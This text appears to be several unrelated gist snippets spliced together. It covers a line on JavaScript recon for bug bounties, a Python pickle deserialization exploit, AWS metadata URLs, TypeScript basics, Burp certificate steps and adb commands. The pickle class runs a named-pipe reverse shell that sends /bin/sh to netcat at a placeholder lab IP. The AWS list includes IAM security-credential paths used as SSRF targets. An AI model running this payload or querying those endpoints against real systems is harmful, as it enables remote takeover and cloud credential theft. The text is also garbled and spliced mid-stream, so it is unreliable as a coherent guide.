This is a simple guide to performing JavaScript reconnaissance in bug bounty work.
- The first step is to collect as many JavaScript files as possible (more files = more paths and parameters -> more vulnerabilities).
import pickle | |
import sys | |
import base64 | |
# Shell string handed to os.system by rce.__reduce__ below; the
# YOUR_TRYHACKME_VPN_IP token is a placeholder, not a real address.
command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat YOUR_TRYHACKME_VPN_IP 4444 > /tmp/f'


class rce(object):
    """Show why unpickling untrusted data is remote code execution.

    ``pickle`` honours ``__reduce__``: the ``(callable, args)`` pair it
    returns is written into the pickle stream, and a later ``pickle.loads``
    of that stream calls ``callable(*args)`` -- here ``os.system(command)``
    -- on whichever host does the loading. The mitigation is on the
    consuming side: never ``pickle.loads`` bytes from an untrusted source;
    use a data-only format such as JSON, or authenticate the serialized
    bytes (e.g. an HMAC verified before deserializing) and restrict the
    globals an ``Unpickler.find_class`` override will resolve.
    """

    def __reduce__(self):
        # ``os`` is not imported at module level (only pickle, sys, base64
        # are), so it is imported here; the pickle stream stores a reference
        # to os.system, and ``command`` is run through the shell at load time.
        import os
        return (os.system, (command,))
## AWS
# Instance metadata endpoints; from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data | |
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/ami-id | |
http://169.254.169.254/latest/meta-data/reservation-id | |
http://169.254.169.254/latest/meta-data/hostname | |
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |
// Basic Types
// Explicit annotations on primitives; the compiler would infer the same
// types from the initializers, so these mainly document intent.
let id: number = 5;
let company: string = 'Traversy Media';
let isPublished: boolean = true;

// Typed arrays: a homogeneous number[] versus an any[] that accepts mixed values.
let ids: number[] = [1, 2, 3, 4, 5];
let arr: any[] = [1, true, 'Hello'];

// `any` opts this binding out of type checking entirely.
let x: any = 'Hello';

// Tuple
To do so: | |
1. Export your Burp CA certificate
Proxy > Options > CA Certificate > Export in DER format
2. Convert it to PEM:
openssl x509 -inform der -in cacert.der -out burp.pem
3. Copy it onto the device
adb help // List all commands
== Adb Server
adb kill-server
adb start-server
== Adb Reboot
adb reboot
adb reboot recovery
adb reboot-bootloader